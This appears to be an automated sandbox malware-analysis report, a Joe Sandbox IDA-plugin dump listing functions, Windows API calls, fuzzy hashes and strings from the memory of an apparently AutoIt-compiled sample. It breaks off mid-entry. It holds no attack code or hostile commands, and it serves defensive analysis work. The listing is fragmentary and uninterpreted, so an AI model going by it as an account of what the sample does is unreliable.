Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: e6397ca77f0d4c74133d7699a27f28ec840e03ea70861dd02a3154a97da788b3
Instruction ID: 05ccec68662ff33bc85792b41529841b8f22aa332dbd8c22ef0b0936e2b06022
Opcode Fuzzy Hash: e6397ca77f0d4c74133d7699a27f28ec840e03ea70861dd02a3154a97da788b3
Instruction Fuzzy Hash: 9F21B631615201BBEB169F759C49B7F7B9CDB4A750F00812AFC09DA192EF71DC60D6A0

Function 002DB14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

GetWindowLongW.USER32(?,000000F0), ref: 002DB192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002DB1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002DB1CF
GetSystemMetrics.USER32(00000004), ref: 002DB1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002C0E90,00000000), ref: 002DB216

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 0fcf5c3d46d9b4ff1be8659b16f700cf12a60f5f605f6205a488dde3e1d93b3f
Instruction ID: ad69f0d54fb0bd6d763a150f67e7b0c2988ad564d722cb420efdd0fca3d5de13
Opcode Fuzzy Hash: 0fcf5c3d46d9b4ff1be8659b16f700cf12a60f5f605f6205a488dde3e1d93b3f
Instruction Fuzzy Hash: CE216271A20652EFCB129F38DC68A6A37A4FB05361F164726FD36D72E0D7309D209B90

Function 002A9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002A9320

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A9352
__itow.LIBCMT ref: 002A936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A9392
__itow.LIBCMT ref: 002A93A3

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: b6637791ec18808fdce5aa6b05eb50085516140b952e22dfe01977799d3c5c12
Instruction ID: 3f9733b821f29a052147bf45df0efc67ac55b75eeae26520aaef35ff9ba7ea66
Opcode Fuzzy Hash: b6637791ec18808fdce5aa6b05eb50085516140b952e22dfe01977799d3c5c12
Instruction Fuzzy Hash: 75210731B21209ABDF109F659C89EEE3BBCEB4A711F048065FD05D71C0DAB0CDA59B91

Function 002C5A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 002C5A6E
GetForegroundWindow.USER32 ref: 002C5A85
GetDC.USER32(00000000), ref: 002C5AC1
GetPixel.GDI32(00000000,?,00000003), ref: 002C5ACD
ReleaseDC.USER32(00000000,00000003), ref: 002C5B08

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 0c4faed97b7e95ef5133a19757e7aa6b474f2bd82baf0f2ab3f908b16317d34a
Instruction ID: cf870a9ace924f9e9ce4082f79236a26ce157e3ba6bfc39fe273e7b33993fd4e
Opcode Fuzzy Hash: 0c4faed97b7e95ef5133a19757e7aa6b474f2bd82baf0f2ab3f908b16317d34a
Instruction Fuzzy Hash: 6621A135A11104AFD700EF65DD88A9ABBE9EF48350F14C579F81A97362CA30ED51CF94

Function 002512F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0025134D
SelectObject.GDI32(?,00000000), ref: 0025135C
BeginPath.GDI32(?), ref: 00251373
SelectObject.GDI32(?,00000000), ref: 0025139C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6469fd0d8f57a3180a02e2fab9a781ec3562e8b37b69bafd58befbb837a7920b
Instruction ID: 90fb0b73c9d381009e60f0a0e35ad435207a73ec6f47b9a9ae1b1f6f1b53fb56
Opcode Fuzzy Hash: 6469fd0d8f57a3180a02e2fab9a781ec3562e8b37b69bafd58befbb837a7920b
Instruction Fuzzy Hash: 4821A130922619FFDB129F29ED087A93BACFB44322F14C256F811961B0D37098B9CF94

Function 002B4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 002B4ABA
__beginthreadex.LIBCMT ref: 002B4AD8
MessageBoxW.USER32(?,?,?,?), ref: 002B4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002B4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002B4B0A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 7b9aed1c6cdfd826a5510a2824f338b8c29d9402c845b827362dc1d0c3d4f665
Instruction ID: c0e6a89fc54d46e03fe7f1d6479d5c6b275fae132fdabe1e841992593731a04a
Opcode Fuzzy Hash: 7b9aed1c6cdfd826a5510a2824f338b8c29d9402c845b827362dc1d0c3d4f665
Instruction Fuzzy Hash: 0F112B76D15245FFC7019FA8EC48ADB7FACEB89360F148266F925D3251D671CD1087A0

Function 002A8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A821E
GetLastError.KERNEL32(?,002A7CE2,?,?,?), ref: 002A8228
GetProcessHeap.KERNEL32(00000008,?,?,002A7CE2,?,?,?), ref: 002A8237
HeapAlloc.KERNEL32(00000000,?,002A7CE2,?,?,?), ref: 002A823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8255

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 7aa7ac8b66f8c3a9edb1dd99d389a5db21ade5ab5c10447ad4537d82366244f5
Instruction ID: c269113f1b03aec0c7ac286586add24357a19ca331f35d6e3562968d7b55ce13
Opcode Fuzzy Hash: 7aa7ac8b66f8c3a9edb1dd99d389a5db21ade5ab5c10447ad4537d82366244f5
Instruction Fuzzy Hash: 11014B71611245EFDB604FA5ED4CD6B7BACEF8A754B50047AF80AC2220DA31CD10CA60

Function 002A710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?,?,002A7455), ref: 002A7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?), ref: 002A7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A716C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 4b3c95e34ace9dfb473cd90e1e5f700790385a48ac28167775bb210ab3dc1fff
Instruction ID: ed9bafc0bf51e1f72a09033fc978cb7602f5b1dfa3dd1fcee78d7944d2784c7b
Opcode Fuzzy Hash: 4b3c95e34ace9dfb473cd90e1e5f700790385a48ac28167775bb210ab3dc1fff
Instruction Fuzzy Hash: F101DF72A22204BBDB104F64ED48BAABBECEF45791F144065FD49D2220DB31DD109BA4

Function 002B5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002B5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002B52BC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 65b984e100a4042b22a5615e6065d9444e64639e731d55c81a7ccce5f1b3e8ba
Instruction ID: 179384e9eda0fc4f38e920e67a0e854fc12103b460b1b3388a839a85b19585d3
Opcode Fuzzy Hash: 65b984e100a4042b22a5615e6065d9444e64639e731d55c81a7ccce5f1b3e8ba
Instruction Fuzzy Hash: 8C011B35D12A29DBCF00EFE8ED4D6EDBB78BB09751F400156E946B6140CB70996087A5

Function 002A810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8157

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 412f584d9abc9d4c42a49cd4c71fd735b1c7ebbbfbf5406f1b15fff67f6baeb2
Instruction ID: dc0d07206f2134d373485776fa75e33186119c440dad044a4a11d8a2bc04afb2
Opcode Fuzzy Hash: 412f584d9abc9d4c42a49cd4c71fd735b1c7ebbbfbf5406f1b15fff67f6baeb2
Instruction Fuzzy Hash: 95F0AF70611315AFEB510FA4EC8CE673BACFF4A755B000036F98AC2150DE60DD11DA60

Function 002AC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 002AC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 002AC20E
MessageBeep.USER32(00000000), ref: 002AC226
KillTimer.USER32(?,0000040A), ref: 002AC242
EndDialog.USER32(?,00000001), ref: 002AC25C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 3829c62a89f2cd2a39aa5c15fa3d242cb2cbfe689000965b034e95863faa8922
Instruction ID: 0cce374c1533335acae609213ee1a9c7c20eba3ff8b5eb25a27efd258d96c595
Opcode Fuzzy Hash: 3829c62a89f2cd2a39aa5c15fa3d242cb2cbfe689000965b034e95863faa8922
Instruction Fuzzy Hash: 2C01A73081430497EB206F50EE4EB96B7BCFB01706F10026AA953918E0DBF0AD548B94

Function 002513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 002513BF
StrokeAndFillPath.GDI32(?,?,0028B888,00000000,?), ref: 002513DB
SelectObject.GDI32(?,00000000), ref: 002513EE
DeleteObject.GDI32 ref: 00251401
StrokePath.GDI32(?), ref: 0025141C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 67b50ac14b24077ebeab38c4dbcd0c305bdd5ef0467eb550050e1a7a4c0b9a19
Instruction ID: faafa4e8806b2c5dadc63b7796bf5636da53c8dd1b35ca7d556aa25254090f94
Opcode Fuzzy Hash: 67b50ac14b24077ebeab38c4dbcd0c305bdd5ef0467eb550050e1a7a4c0b9a19
Instruction Fuzzy Hash: 09F03C30512B0DEBDB125F2AED4C7983FA9A744327F08C225E82A490F1C73189B9DF18

Function 002BC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 002BC432
CoCreateInstance.OLE32(002E2D6C,00000000,00000001,002E2BDC,?), ref: 002BC44A

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

CoUninitialize.OLE32 ref: 002BC6B7

Strings

.lnk, xrefs: 002BC3C6, 002BC3EE, 002BC3F8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: c505bcb0fa04528f08762429aa4b696eeeb62ede88827aaacfa30e36fabcc69a
Instruction ID: 82da4e70b03bff818979eb0da8363a8c10bf2bb76335e7333e612a962a1129d5
Opcode Fuzzy Hash: c505bcb0fa04528f08762429aa4b696eeeb62ede88827aaacfa30e36fabcc69a
Instruction Fuzzy Hash: 35A16AB1114205AFD300EF64C881EABB7ECEF85355F00492CF9569B1A2EB70EA59CF56

Function 00262CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 00257A51: _memmove.LIBCMT ref: 00257AAB

__swprintf.LIBCMT ref: 00262ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00262D66

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: fe80358daaec11c99a4d14f0c13a9917be7ed71b8d354ac8b25926e5f29ea0fd
Instruction ID: 0c3ab05f44d4a92014937a6941bff325cc31025f8f337d8f47100a74dbbde61c
Opcode Fuzzy Hash: fe80358daaec11c99a4d14f0c13a9917be7ed71b8d354ac8b25926e5f29ea0fd
Instruction Fuzzy Hash: 83918E71128612DFCB14EF24D895C6FB7E8EF85714F00491DF8459B2A1EA30EDA8CB56

Function 002BB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770

CoInitialize.OLE32(00000000), ref: 002BB9BB
CoCreateInstance.OLE32(002E2D6C,00000000,00000001,002E2BDC,?), ref: 002BB9D4
CoUninitialize.OLE32 ref: 002BB9F1

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

Strings

.lnk, xrefs: 002BB99D, 002BB9AB

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: fe9133f34e98d822b4b18895f17f9e7c84053a09448407deb1d2a365db6e2e54
Instruction ID: b291905d63fc731f42183037c7dbefc620d0dfac4ccf3192aaa83024392534ce
Opcode Fuzzy Hash: fe9133f34e98d822b4b18895f17f9e7c84053a09448407deb1d2a365db6e2e54
Instruction Fuzzy Hash: 0FA144756242019FCB00DF14C884D6ABBE5FF89314F148998F89A9B3A2CB71EC59CF91

Function 002AB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 002AB4BE

Strings

AutoIt3GUI, xrefs: 002AB436
%., xrefs: 002AB561
Container, xrefs: 002AB43B

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%.
API String ID: 3565006973-783795609
Opcode ID: 1b3c2351e0e8b1707b7b3c3ec47ac5f9fd2d09988e88acf0302c12fe71761d73
Instruction ID: 6bf93f6ef345e21caae683837633921a875c13c289982c2425765ef9b4245cae
Opcode Fuzzy Hash: 1b3c2351e0e8b1707b7b3c3ec47ac5f9fd2d09988e88acf0302c12fe71761d73
Instruction Fuzzy Hash: 4B916A70610601EFDB15CF64C894B6ABBE9FF4A700F24856DF90ACB292DBB1E851CB50

Function 0027501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002750AD

Part of subcall function 002800F0: __87except.LIBCMT ref: 0028012B

Strings

pow, xrefs: 00275085, 002750A2

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: c19b9c4b185c0caf273b4d32b8e26e91d81b368f06fcdf6f4a6e0d60be967d3d
Instruction ID: 6e59fe2f1a44f9b9c01f8cf512fff44631eef889f14959ae0a53b85a39318afb
Opcode Fuzzy Hash: c19b9c4b185c0caf273b4d32b8e26e91d81b368f06fcdf6f4a6e0d60be967d3d
Instruction Fuzzy Hash: 8B517C2493A50386DB517F28C88936EAB949B01710F30CD59E4DD862E9DFF48DFC9B86

Function 00298584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0029862B
_memmove.LIBCMT ref: 00298685

Strings

3c&, xrefs: 0029860C
_&, xrefs: 002986FF, 0029DFDC, 0029DFF8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
